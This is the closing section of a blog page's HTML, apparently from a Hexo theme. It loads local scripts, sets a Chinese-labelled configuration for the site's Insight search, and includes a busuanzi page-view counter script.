</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   






</body>
</html>